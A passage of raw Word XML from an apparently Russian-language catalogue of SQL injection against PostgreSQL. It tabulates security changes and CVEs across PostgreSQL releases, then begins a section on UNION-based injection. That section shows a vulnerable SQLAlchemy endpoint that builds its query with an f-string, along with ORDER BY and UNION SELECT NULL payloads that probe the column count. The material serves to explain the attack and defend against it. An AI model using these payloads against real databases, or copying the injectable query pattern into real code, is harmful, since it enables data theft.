          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">schema_element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.13.2), CVE-2024-10976 с RLS bypass через подмену плана (3.17.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5 Изменения безопасности по релизам</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводно, что каждая мажорная версия PG 14–17 принесла на поверхности атаки и в защитных механизмах. Эту таблицу удобно держать перед глазами при чтении категорий.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val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Версия</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Новое и релевантное для безопасности</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14 (2021)</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Предопределённые роли </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_read_all_data</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pg_write_all_data</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pg_database_owner</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. Multirange types (новая поверхность для type-casting tricks).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15 (2022)</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REVOKE CREATE ON public FROM PUBLIC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> по умолчанию для новых кластеров — закрывает CVE-2018-1058-class атаки. Введён </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MERGE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (открыл свою поверхность — CVE-2023-39418). </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">security_invoker</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> для views.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16 (2023)</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Предопределённые роли </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_create_subscription</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pg_use_reserved_connections</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. Логическая репликация для standby-серверов.</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17 (2024)</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Предопределённая роль </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_maintain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> и привилегия </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MAINTAIN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. Event trigger </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ON LOGIN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — новая поверхность для persistence через event-триггер.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Минорные релизы за 2024–2025, закрывшие критичные SQLi-related CVE (полная хронология — раздел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val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Минор</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Что закрыто</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 / 16.5 / 15.9 / 14.14 / 13.17 (ноябрь 2024)</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CVE-2024-10976 (RLS bypass через subquery), CVE-2024-10977 (libpq MITM error msg), CVE-2024-10978 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SET ROLE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> reset), CVE-2024-10979 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">plperl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> env → RCE)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17.3 / 16.7 / 15.11 / 14.16 / 13.19 (февраль 2025)</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 (psql + invalid UTF-8, CVSS 8.1)</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17.5 / 16.9 / 15.13 / 14.18 / 13.21</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CVE-2025-4207 (GB18030 buffer over-read, DoS)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 / 16.10 / 15.14 / 14.19 / 13.22</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CVE-2025-8713 (optimizer stats обходят view ACL/RLS), CVE-2025-8715 (newline в object names → injection при restore)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18.1 / 17.7 / 16.11 / 15.15 / 14.20 / 13.23</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CVE-2025-12817 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CREATE STATISTICS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> DoS через name squat)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Отдельный случай — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-4317</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (утечка через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закрыта в 16.3 / 15.7 / 14.12). Установка минор-патча не закрывает уязвимость автоматически — администратор должен вручную запустить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в каждой БД, включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">template0</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template1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. На managed-провайдерах это часто не делается, поэтому версия минора «patched» не равно «не уязвимо». Подробности — раздел 4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Каталог категорий инъекций</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 UNION-based</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.0 Обзор категории</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL требует точного совпадения числа колонок и совместимости типов в обеих частях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 это определяет всю механику паттерна. Перед извлечением данных атакующий обнаруживает число колонок (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или nullable-пробинг) и подгоняет типы кастами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После этого UNION становится универсальным каналом извлечения произвольных данных, в том числе метаданных из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Типичные точки входа: числовые ID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IN-списки идентификаторов, любые места, где user input склеивается в SELECT-запрос без параметризации. Канал требует, чтобы результат UNION-а возвращался в HTTP-ответ — это не blind-техника, утечка идёт напрямую через тот же путь, по которому приложение отдаёт легитимные данные.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория состоит из четырёх подразделов: два подготовительных (определение числа колонок и типов), один по самой типичной точке входа (IN-список) и один по конечной цели — извлечению метаданных. Дальше канал может расширяться в любые таблицы, к которым у application-роли есть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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.1 Определение числа колонок</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Перед извлечением данных через UNION нужно знать арность исходного SELECT. PG-сервер возвращает ошибку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">each UNION query must have the same number of columns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при несовпадении — это служит бинарным oracle для атакующего.</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># api/views.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from sqlalchemy import text</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@app.get("/products")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def get_product(product_id: str):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = f"SELECT id, name, price FROM products WHERE id = {product_id}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with engine.begin() as conn:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        result = await conn.execute(text(sql))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return [dict(row) for row in result.mappings()]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pP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вокруг f-string не даёт защиты — это просто текстовый SQL, склеенный из переменных. SQLAlchemy исполнит его как есть.</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 Ниже — два варианта с пошаговой постановкой и тем, что сервер видит после подстановки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Техника 1 —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с инкрементом. Атакующий шлёт серию запросов:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">product_id = 1 ORDER BY 1--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">product_id = 1 ORDER BY 2--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">product_id = 1 ORDER BY 3--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">product_id = 1 ORDER BY 4--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер видит, например, при четвёртом запросе:</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1 ORDER BY 4--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: ORDER BY position 4 is not in select list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — значит, в исходном SELECT 3 колонки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Техника 2 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с инкрементом числа NULL-ов:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">product_id = 1 UNION SELECT NULL--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">product_id = 1 UNION SELECT NULL, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">product_id = 1 UNION SELECT NULL, NULL, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
